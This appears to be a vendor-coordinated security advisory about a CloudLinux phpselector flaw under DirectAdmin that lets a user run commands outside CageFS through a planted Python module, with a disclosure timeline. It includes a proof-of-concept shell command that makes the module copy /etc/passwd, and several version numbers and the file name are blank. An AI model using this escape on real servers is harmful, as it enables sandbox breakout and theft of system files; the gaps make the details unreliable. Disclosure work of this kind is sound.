Affected software: lvemanager versions below, lve-utils versions below, lve-stats versions below

CloudLinux phpselector for DirectAdmin is written in python. When phpselector script is executed by DirectAdmin, it tries to load modules from /home/USER/.local/lib/python2.7/site-packages/ before entering CageFS. By creating file, custom commands can be executed outside CageFS.


$ mkdir -p /home/USER/.local/lib/python2.7/site-packages/
$ echo -e "import os\nos.system('/usr/bin/cat /etc/passwd > /home/USER/output')" > /home/USER/.local/lib/python2.7/site-packages/

Now go to DirectAdmin phpselector plugin and click "Save".


Update lvemanager to or later, lve-utils to or later, lve-stats to or later.


  • 2019-08-12 - Vulnerability reported to vendor.
  • 2019-08-12 - Response from vendor, task WEB-1552 assigned.
  • 2019-10-09 - Production version 5.1.2-1 of lvemanager, of lve-utils, of lve-stats released with WEB-1552 vulnerability fixed.